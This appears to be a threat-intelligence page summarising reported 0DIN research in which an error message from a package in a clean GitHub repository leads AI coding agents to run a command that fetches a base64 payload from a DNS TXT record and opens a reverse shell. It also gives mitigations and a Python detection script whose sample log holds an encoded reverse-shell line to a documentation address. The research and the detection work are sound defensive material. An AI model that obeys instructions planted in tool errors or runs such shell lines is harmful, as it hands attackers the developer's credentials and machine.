
0DIN: Clean GitHub Repos Can Trick AI Agents Into Reverse Shells

Medium
Published: 06/27/2026 (06/27/2026, 20:33:01 UTC)
Source: Reddit Cybersecurity

Description

Researchers at Mozilla's Zero Day Investigative Network (0DIN) demonstrated a novel attack in which AI coding agents such as Claude Code are tricked into executing a reverse shell by working through a clean-looking GitHub repository. The repository's ordinary setup step installs a package that fails with an error telling the agent to run an initialization command; that command resolves an attacker-controlled DNS TXT record, base64-decodes the value and executes it, yielding a reverse shell that runs with the developer's privileges. No traditional vulnerability is exploited and the repository itself contains no malicious code, so conventional security tools that examine any one step in isolation see nothing wrong. The researchers recommend that AI agents disclose the full execution chain of setup commands, including dynamically fetched code, before running them.

Reddit Discussion

r/cybersecurity·posted by u/Justgototheeffinmoon

The attack that Mozilla's 0DIN researchers detailed this week is not a vulnerability in any conventional sense. There is no zero-day, no memory corruption, no authentication bypass. It is an exploitation of exactly the behavior that makes AI coding agents useful: when a setup step fails, the agent reads the error and tries to fix it.

As [BleepingComputer reports](https://www.bleepingcomputer.com/news/security/clean-github-repo-tricks-ai-coding-agents-into-running-malware/), researchers at Mozilla's Zero Day Investigative Network demonstrated a three-stage attack against Claude Code and similar agentic tools. The first stage is a GitHub repository that looks entirely legitimate, with standard setup instructions such as `pip3 install -r requirements.txt`. The package installed by that command is engineered to throw an error instructing the agent to run `python3 -m axiom init`. That initialization command then silently resolves an attacker-controlled DNS TXT record, retrieves a base64-encoded value, and executes it via bash. The decoded payload is a reverse shell.

The researchers described the logic precisely: "Claude Code never decided to open a shell. It decided to fix an error. The reverse shell is three indirection steps away from anything Claude Code actually evaluated." That framing explains why conventional defenses miss it. Static scanners see only ordinary DNS resolution. AI analysis tools find nothing malicious in the repository. Every layer of the chain appears benign to every tool examining that layer in isolation.

Successful exploitation hands the attacker a shell running with the developer's own privileges, according to the research, meaning access to environment variables, API keys, and local configuration files. The payload can be swapped out by editing the DNS record alone, with no changes to the repository at all, so a codebase that looked clean during review could deliver something entirely different the next day.

0DIN warned the distribution surface is wide: such repositories could reach developers through fake job postings, tutorials, blog posts, or direct messages. The mitigation they recommended is specific: AI agents should fully disclose the execution chains of setup commands, including dynamically-fetched scripts and code, before running them. What the reporting does not give you is whether Anthropic or other tool vendors have committed to specific changes in response.

AI-Powered Analysis

Machine-generated threat intelligence

Last updated: 06/27/2026, 20:36:20 UTC

Technical Analysis

The 0DIN researchers demonstrated a three-stage attack that exploits the error-recovery behavior of AI coding agents. Stage one is a clean-looking GitHub repository with ordinary setup instructions (`pip3 install -r requirements.txt`). Stage two is the package that command installs: it is engineered to fail with an error message telling the agent to run an initialization command (`python3 -m axiom init`). Stage three is that command, which resolves an attacker-controlled DNS TXT record, base64-decodes the value and passes it to bash; the decoded payload is a reverse shell. Each hop looks benign to a tool that examines it on its own: the repository contains no malicious code, the error is just text, and the initialization command does nothing more suspicious than a DNS lookup, so static scanners and AI review tools find nothing. Successful exploitation gives the attacker a shell with the developer's privileges and therefore access to environment variables, API keys and local configuration files. Because the payload lives in the DNS record, the attacker can change it at any time without touching the repository, so a codebase that passed review can deliver something different the next day. Distribution vectors named by the researchers include fake job postings, tutorials, blog posts and direct messages. The recommended mitigation is for AI agents to fully disclose the execution chain of setup commands, including any dynamically fetched scripts or code, before running them.

Potential Impact

If exploited, the attacker gains an interactive shell running with the developer's user privileges, allowing access to sensitive environment variables, API keys, and local configuration files. This can lead to unauthorized access, data exposure, and potential persistence on the developer's system. The attack bypasses conventional detection methods because no malicious code resides in the repository itself, and each step appears benign when analyzed in isolation.

Mitigation Recommendations

There is no traditional patch or fix, since this is an exploitation of AI agent behavior rather than a software vulnerability. The mitigation the researchers recommend is that AI coding agents fully disclose the entire execution chain of setup commands, including any dynamically fetched scripts or code, before running them, so the developer can review and approve potentially dangerous commands rather than discover them afterwards. Until agent vendors ship that, teams using coding assistants can reduce exposure with controls that do not depend on the research: keep shell execution on explicit per-command approval rather than auto-accept, and treat an error message that tells the agent what to run next as untrusted input; run first-time setup of an unfamiliar repository in a disposable container or VM that holds none of the developer's credentials; and watch for DNS TXT lookups and outbound connections from developer hosts during package installation, since the reported chain depends on both. None of these replace scrutinizing automated setup steps carefully.
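For the security-team side of the mitigation above, the same staging pattern can be hunted in resolver logs that record answer data. The following is an added example written for this page, not a vendor or 0DIN detection; the log lines, host names, the name cfg.stager.example and the addresses are constructed, and the five-field format is an assumption you would map onto your own source (Zeek's dns.log, for instance, records query, qtype_name and answers).

```python
"""Hunt resolver logs for TXT answers that decode to command-like text.

Added example for this page, not a vendor or 0DIN detection. The log format
is constructed: one query per line, ts|src_host|qname|qtype|answer. Any
resolver log that records answer data can be mapped onto these five fields;
logs that record only the question give this hunt nothing to look at.
"""
import base64
import binascii
from typing import Dict, Iterable, List, Optional

# Constructed sample log. The staged answer is built with b64encode so the
# sample stays consistent; 203.0.113.10 and 198.51.100.7 are documentation
# addresses and cfg.stager.example is a made-up name.
_STAGED = base64.b64encode(b"bash -i >& /dev/tcp/203.0.113.10/4444 0>&1").decode()
_NOTE = base64.b64encode(b"build=2026.06").decode()
SAMPLE_LOG = f"""\
2026-06-27T20:01:03Z|dev-laptop-07|_dmarc.example.com|TXT|v=DMARC1; p=reject
2026-06-27T20:01:09Z|dev-laptop-07|example.com|TXT|v=spf1 include:_spf.example.com ~all
2026-06-27T20:02:41Z|dev-laptop-07|cfg.stager.example|TXT|{_STAGED}
2026-06-27T20:03:00Z|build-runner-02|files.example|A|198.51.100.7
2026-06-27T20:03:12Z|dev-laptop-07|_acme-challenge.example.com|TXT|rV4DmC0kLqm9Ykt8xNwxQwaQ2jPq4iwhS9zS3hQbfa0
2026-06-27T20:04:30Z|dev-laptop-07|notes.example.com|TXT|{_NOTE}
"""

# Names under which opaque-looking TXT values are normal (validation tokens).
EXPECTED_TXT_PREFIXES = ("_dmarc.", "_acme-challenge.", "_dkim.", "_domainkey.")
# Characters that rarely appear in legitimate TXT text but do in shell syntax.
SHELL_METACHARS = set("|&;<>$`/")


def decode_base64_text(value: str) -> Optional[str]:
    """Strict base64 decode to printable UTF-8 text; None for anything else.

    Plain SPF/DMARC strings fail the alphabet check and random tokens usually
    fail padding or UTF-8, so only deliberately encoded text gets through.
    """
    try:
        text = base64.b64decode(value.strip().strip('"'), validate=True).decode("utf-8")
    except (binascii.Error, ValueError):
        return None
    if not text.strip() or not all(c.isprintable() or c in "\n\t" for c in text):
        return None
    return text


def hunt_txt_staging(lines: Iterable[str]) -> List[Dict[str, str]]:
    """One finding per TXT answer that is base64-wrapped text."""
    findings: List[Dict[str, str]] = []
    for line in lines:
        fields = line.strip().split("|", 4)
        if len(fields) != 5:
            continue
        ts, src, qname, qtype, answer = fields
        if qtype != "TXT":
            continue
        decoded = decode_base64_text(answer)
        if decoded is None:
            continue
        metachars = SHELL_METACHARS.intersection(decoded)
        if len(metachars) >= 2:
            severity = "high"      # encoded text carrying shell syntax: stager-shaped
        elif not qname.startswith(EXPECTED_TXT_PREFIXES):
            severity = "review"    # encoded text from an unexpected name: look at it
        else:
            continue
        findings.append({"ts": ts, "src": src, "qname": qname,
                         "severity": severity, "preview": decoded[:60]})
    return findings


if __name__ == "__main__":
    for f in hunt_txt_staging(SAMPLE_LOG.splitlines()):
        print(f"{f['severity']:6} {f['ts']} {f['src']} {f['qname']} -> {f['preview']!r}")
```

Confirm your resolver or sensor actually retains answer data before relying on this, and expect to tune the metacharacter threshold and the expected-prefix list against your own TXT baseline; the ACME and DMARC lines in the sample are there precisely because legitimate TXT traffic is full of values that look opaque but are not base64 text.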


Technical Details

Source Type
reddit
Subreddit
cybersecurity
Reddit Score
0
Discussion Level
minimal
Content Source
reddit_link_post
Post Type
link
Domain
null
Newsworthiness Assessment
{"score":27,"reasons":["external_link","established_author","very_recent"],"isNewsworthy":true,"foundNewsworthy":[],"foundNonNewsworthy":[]}
Has External Source
true
Trusted Domain
false

Threat ID: 6a40343e27e9c7971920dce2

Added to database: 06/27/2026, 20:36:14 UTC

Last enriched: 06/27/2026, 20:36:20 UTC

Last updated: 06/27/2026, 22:51:13 UTC

Views: 6


